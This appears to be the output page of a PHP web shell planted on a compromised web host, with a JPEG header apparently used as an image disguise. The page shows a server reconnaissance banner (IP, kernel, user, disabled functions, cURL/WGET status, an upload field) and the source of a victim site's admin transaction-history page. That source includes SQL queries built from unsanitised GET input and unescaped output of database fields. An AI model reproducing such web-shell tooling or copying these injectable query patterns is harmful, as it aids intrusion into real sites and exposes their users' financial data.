���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/jeevikagaumaa.in/public_html/admin/ |
Upload File : |
<?php include '../action/check-login.php'; include '../action/config.php'; // $userid = $_GET['userid']; // $qry = mysqli_query($con,"SELECT * FROM `users` WHERE userid='$userid'"); // $r=mysqli_fetch_array($qry); // $KYC_qry = mysqli_query($con,"SELECT * FROM `user_kyc` WHERE userid='$userid'"); // $kyc=mysqli_fetch_array($KYC_qry); // $wallet_qry = mysqli_query($con,"SELECT * FROM `user_wallet` WHERE userid='$userid'"); // $wallet=mysqli_fetch_array($wallet_qry); // $bank_qry = mysqli_query($con,"SELECT * FROM `user_bank` WHERE userid='$userid'"); // $bnk = mysqli_fetch_array($bank_qry); // if($bnk['ac_name']==NULL || $bnk['ac_num']==NULL || $bnk['ifsc']==NULL || $bnk['bank_name']==NULL || $bnk['branch']==NULL){ // $bnk['ac_name'] = 'Account Not Updated'; // $bnk['ac_num'] = 'Account Not Updated'; // $bnk['ifsc'] = 'Account Not Updated'; // $bnk['bank_name'] = 'Account Not Updated'; // $bnk['branch'] = 'Account Not Updated'; // } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <meta name="description" content="" /> <meta name="author" content="" /> <title>Transaction History</title> <link href="css/styles.css" rel="stylesheet" /> <link href="https://cdn.datatables.net/1.10.20/css/dataTables.bootstrap4.min.css" rel="stylesheet" crossorigin="anonymous" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js" crossorigin="anonymous"></script> <link rel="shortcut icon" href="../images/logo3.png" /> <style> #blink { font-weight: bold; color: #2d38be; transition: 0.5s; } </style> </head> <body class="sb-nav-fixed"> <?php include 'sidebar_menu.php'; ?> <main> <div class="container-fluid"> <ol class="breadcrumb mb-4 mt-2"> <li class="breadcrumb-item font-weight-bold">Transaction Details</li> </ol> <div class="card"> <div class="card-header d-block d-md-flex"> <h5 class="mb-0 text-primary">Transaction History</h5> </div> <div class="card-body"> <table class="table table-sm table-bordered" id="dataTable" width="100%" cellspacing="0"> <thead> <tr> <th>#</th> <th>User Id</th> <th>Transaction Id</th> <th><span class="text-danger">Debit</span> / <span class="text-success">Credit</span></th> <th>Date</th> <th>Remark</th> <th>Status</th> <!--<th>Edit</th>--> </tr> </thead> <tbody> <?php $i=0; $transaction_qry=mysqli_query($con,"SELECT * FROM `transaction` ORDER BY id DESC"); while($re=mysqli_fetch_array($transaction_qry)){ $i++; ?> <tr> <td><?php echo $i; ?></td> <td><?php echo $re['userid']; ?></td> <td><?php echo $re['tr_id']; ?></td> <td> <?php if($re['debit']==0){ echo '<span class="text-success">'.$re['credit'].'</span>'; }else{ echo '<span class="text-danger">'.$re['debit'].'</span>'; } ?> </td> <td><?php echo $re['tr_date']; ?></td> <td><?php echo $re['remark']; ?></td> <td> <?php if($re['status'] == 'pending' || $re['status'] == 'Pending'){ echo '<i class="fas fa-exclamation-triangle text-danger"></i> <span class="badge badge-pill badge-danger p-2">Pending</span> '; }else{ echo '<span class="badge badge-pill badge-success p-2"> Success</span> '; } ?> </td> <!--<td class="text-center">--> <!-- <a href="" title="Edit Remark and Status" ><i class="fas fa-edit text-primary"></i></a>--> <!--</td>--> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </main> <?php include 'footer.php'; ?> <script> $('#dataTable').dataTable( { "pageLength": 100 }); var blink = document.getElementById('blink'); setInterval(function() { blink.style.opacity = (blink.style.opacity == 0 ? 1 : 0); }, 700); </script> </body> </html>